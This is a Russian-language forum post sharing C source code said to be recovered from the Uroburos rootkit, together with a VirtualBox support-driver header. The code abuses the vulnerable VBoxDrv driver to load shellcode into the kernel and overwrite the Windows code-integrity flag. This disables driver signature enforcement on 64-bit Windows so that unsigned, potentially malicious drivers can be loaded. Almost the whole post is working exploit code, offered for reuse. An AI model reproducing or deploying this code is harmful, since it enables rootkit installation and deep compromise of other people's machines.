Собссно "восстановленный" код из Uroburos. Позволяет грузить дрова на х64 винде в обход патчгварда и что-то еще вроде =)
vbox.h
Взято с кернелмода
А ну и сам дров скорее всего надо отсюда выковыривать
Код:
#include "vbox.h"
#include "prtl.h"
const unsigned char shellcode[] = {
0x33, 0xC0, 0xC3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* xor eax, eax */
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 /* ret */
};
VOID DisableDSE(
PVOID g_CiEnabledAddr
)
{
HANDLE hObject = NULL;
SUPCOOKIE Cookie;
SUPLDROPEN OpenLdr;
DWORD bytesIO = 0;
PVOID ImageBase = NULL;
PSUPLDRLOAD pLoadTask = NULL;
SUPSETVMFORFAST vmFast;
hObject = CreateFile(TEXT("\\\\.\\VBoxDrv"), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if (hObject != INVALID_HANDLE_VALUE) {
memset(&Cookie, 0, sizeof(SUPCOOKIE));
Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE;
Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN;
Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT;
Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
Cookie.Hdr.rc = 0;
Cookie.u.In.u32ReqVersion = 0;
Cookie.u.In.u32MinVersion = 0x00070002;
_strcpyA(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC);
if (!DeviceIoControl(hObject, SUP_IOCTL_COOKIE, &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie,
SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) goto fail;
memset(&OpenLdr, 0, sizeof(OpenLdr));
OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN;
OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT;
OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
OpenLdr.Hdr.rc = 0;
OpenLdr.u.In.cbImage = sizeof(OpenLdr.u.In.szName);
OpenLdr.u.In.szName[0] = 'a';
OpenLdr.u.In.szName[1] = 0;
if (!DeviceIoControl(hObject, SUP_IOCTL_LDR_OPEN, &OpenLdr, SUP_IOCTL_LDR_OPEN_SIZE_IN,
&OpenLdr, SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) goto fail;
ImageBase = OpenLdr.u.Out.pvImageBase;
pLoadTask = (PSUPLDRLOAD)VirtualAlloc(NULL, 0x90, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pLoadTask == NULL) goto fail;
RtlSecureZeroMemory(pLoadTask, 0x90);
pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
pLoadTask->Hdr.cbIn = 0x88;
pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT;
pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC;
pLoadTask->Hdr.rc = 0;
pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0;
pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (PVOID)0x1000;
pLoadTask->u.In.pvImageBase = (RTR0PTR)ImageBase;
pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = (RTR0PTR)ImageBase;
pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = (RTR0PTR)ImageBase;
pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = (RTR0PTR)ImageBase;
memcpy(pLoadTask->u.In.achImage, shellcode, sizeof(shellcode));
pLoadTask->u.In.cbImage = sizeof(shellcode);
if (!DeviceIoControl(hObject, SUP_IOCTL_LDR_LOAD, pLoadTask, 0x88,
pLoadTask, sizeof(SUPREQHDR), &bytesIO, NULL)) goto fail;
vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
vmFast.Hdr.rc = 0;
vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN;
vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT;
vmFast.u.In.pVMR0 = (PVOID)0x1000;
if (!DeviceIoControl(hObject, SUP_IOCTL_SET_VM_FOR_FAST,
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN,
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) goto fail;
DeviceIoControl(hObject, SUP_IOCTL_FAST_DO_NOP, g_CiEnabledAddr, 0, g_CiEnabledAddr, 0, &bytesIO, NULL);
fail:
if (hObject != INVALID_HANDLE_VALUE) CloseHandle(hObject);
if (pLoadTask != NULL) VirtualFree(pLoadTask, 0, MEM_RELEASE);
}
}vbox.h
Код:
#include <stdint.h>
#pragma pack(8)
typedef void* RTR0PTR;
typedef struct SUPREQHDR
{
/** Cookie. */
uint32_t u32Cookie;
/** Session cookie. */
uint32_t u32SessionCookie;
/** The size of the input. */
uint32_t cbIn;
/** The size of the output. */
uint32_t cbOut;
/** Flags. See SUPREQHDR_FLAGS_* for details and values. */
uint32_t fFlags;
/** The VBox status code of the operation, out direction only. */
int32_t rc;
} SUPREQHDR;
/** SUP_IOCTL_COOKIE. */
typedef struct SUPCOOKIE
{
/** The header.
* u32Cookie must be set to SUPCOOKIE_INITIAL_COOKIE.
* u32SessionCookie should be set to some random value. */
SUPREQHDR Hdr;
union
{
struct
{
/** Magic word. */
char szMagic[16];
/** The requested interface version number. */
uint32_t u32ReqVersion;
/** The minimum interface version number. */
uint32_t u32MinVersion;
} In;
struct
{
/** Cookie. */
uint32_t u32Cookie;
/** Session cookie. */
uint32_t u32SessionCookie;
/** Interface version for this session. */
uint32_t u32SessionVersion;
/** The actual interface version in the driver. */
uint32_t u32DriverVersion;
/** Number of functions available for the SUP_IOCTL_QUERY_FUNCS request. */
uint32_t cFunctions;
/** Session handle. */
/*R0PTRTYPE(PSUPDRVSESSION)*/ PVOID pSession;
} Out;
} u;
} SUPCOOKIE, *PSUPCOOKIE;
typedef struct SUPLDROPEN
{
/** The header. */
SUPREQHDR Hdr;
union
{
struct
{
/** Size of the image we'll be loading. */
uint32_t cbImage;
/** Image name.
* This is the NAME of the image, not the file name. It is used
* to share code with other processes. (Max len is 32 chars!) */
char szName[32];
} In;
struct
{
/** The base address of the image. */
RTR0PTR pvImageBase;
/** Indicate whether or not the image requires loading. */
bool fNeedsLoading;
} Out;
} u;
} SUPLDROPEN, *PSUPLDROPEN;
typedef enum SUPLDRLOADEP
{
SUPLDRLOADEP_NOTHING = 0,
SUPLDRLOADEP_VMMR0,
SUPLDRLOADEP_SERVICE,
SUPLDRLOADEP_32BIT_HACK = 0x7fffffff
} SUPLDRLOADEP;
typedef struct SUPSETVMFORFAST
{
/** The header. */
SUPREQHDR Hdr;
union
{
struct
{
/** The ring-0 VM handle (pointer). */
PVOID pVMR0;
} In;
} u;
} SUPSETVMFORFAST, *PSUPSETVMFORFAST;
typedef struct SUPLDRLOAD
{
/** The header. */
SUPREQHDR Hdr;
union
{
struct
{
/** The address of module initialization function. Similar to _DLL_InitTerm(hmod, 0). */
PVOID pfnModuleInit;
/** The address of module termination function. Similar to _DLL_InitTerm(hmod, 1). */
PVOID pfnModuleTerm;
/** Special entry points. */
union
{
/** SUPLDRLOADEP_VMMR0. */
struct
{
/** The module handle (i.e. address). */
RTR0PTR pvVMMR0;
/** Address of VMMR0EntryInt function. */
RTR0PTR pvVMMR0EntryInt;
/** Address of VMMR0EntryFast function. */
RTR0PTR pvVMMR0EntryFast;
/** Address of VMMR0EntryEx function. */
RTR0PTR pvVMMR0EntryEx;
} VMMR0;
/** SUPLDRLOADEP_SERVICE. */
struct
{
/** The service request handler.
* (PFNR0SERVICEREQHANDLER isn't defined yet.) */
RTR0PTR pfnServiceReq;
/** Reserved, must be NIL. */
RTR0PTR apvReserved[3];
} Service;
} EP;
/** Address. */
RTR0PTR pvImageBase;
/** Entry point type. */
SUPLDRLOADEP eEPType;
/** The offset of the symbol table. */
uint32_t offSymbols;
/** The number of entries in the symbol table. */
uint32_t cSymbols;
/** The offset of the string table. */
uint32_t offStrTab;
/** Size of the string table. */
uint32_t cbStrTab;
/** Size of image (including string and symbol tables). */
uint32_t cbImage;
/** The image data. */
char achImage[1];
} In;
} u;
} SUPLDRLOAD, *PSUPLDRLOAD;
#define RT_SIZEOFMEMB(type, member) ( sizeof(((type *)(void *)0)->member) )
#define SUPCOOKIE_INITIAL_COOKIE 0x69726f74 /* 'tori' */
#define SUP_IOCTL_COOKIE_SIZE_IN sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.In)
#define SUP_IOCTL_COOKIE_SIZE_OUT sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.Out)
#define SUP_IOCTL_FLAG 128
#define SUP_CTL_CODE_SIZE(Function, Size) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define SUP_CTL_CODE_BIG(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define SUP_CTL_CODE_FAST(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_NEITHER, FILE_WRITE_ACCESS)
#define SUP_CTL_CODE_NO_SIZE(uIOCtl) (uIOCtl)
/** The magic value. */
#define SUPREQHDR_FLAGS_MAGIC UINT32_C(0x42000042)
/** The default value. Use this when no special stuff is requested. */
#define SUPREQHDR_FLAGS_DEFAULT SUPREQHDR_FLAGS_MAGIC
#define VERR_INTERNAL_ERROR (-225)
#define SUPCOOKIE_MAGIC "The Magic Word!"
#define SUPDRV_IOC_VERSION 0x001a0007
/** The request size. */
#define SUP_IOCTL_COOKIE_SIZE sizeof(SUPCOOKIE)
/** Negotiate cookie. */
#define SUP_IOCTL_COOKIE SUP_CTL_CODE_SIZE(1, SUP_IOCTL_COOKIE_SIZE)
/** There is extra input that needs copying on some platforms. */
#define SUPREQHDR_FLAGS_EXTRA_IN UINT32_C(0x00000100)
/** There is extra output that needs copying on some platforms. */
#define SUPREQHDR_FLAGS_EXTRA_OUT UINT32_C(0x00000200)
/** @name SUP_IOCTL_SET_VM_FOR_FAST
* Set the VM handle for doing fast call ioctl calls.
* @{
*/
#define SUP_IOCTL_SET_VM_FOR_FAST SUP_CTL_CODE_SIZE(19, SUP_IOCTL_SET_VM_FOR_FAST_SIZE)
#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE sizeof(SUPSETVMFORFAST)
#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN sizeof(SUPSETVMFORFAST)
#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT sizeof(SUPREQHDR)
#define SUP_IOCTL_FAST_DO_NOP SUP_CTL_CODE_FAST(66)
#define SUP_IOCTL_LDR_OPEN SUP_CTL_CODE_SIZE(5, SUP_IOCTL_LDR_OPEN_SIZE)
#define SUP_IOCTL_LDR_OPEN_SIZE sizeof(SUPLDROPEN)
#define SUP_IOCTL_LDR_OPEN_SIZE_IN sizeof(SUPLDROPEN)
#define SUP_IOCTL_LDR_OPEN_SIZE_OUT (sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPLDROPEN, u.Out))
#define SUP_IOCTL_LDR_LOAD SUP_CTL_CODE_BIG(6)
#define SUP_IOCTL_LDR_LOAD_SIZE(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage])
#define SUP_IOCTL_LDR_LOAD_SIZE_IN(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage])
#define SUP_IOCTL_LDR_LOAD_SIZE_OUT sizeof(SUPREQHDR)Взято с кернелмода
А ну и сам дров скорее всего надо отсюда выковыривать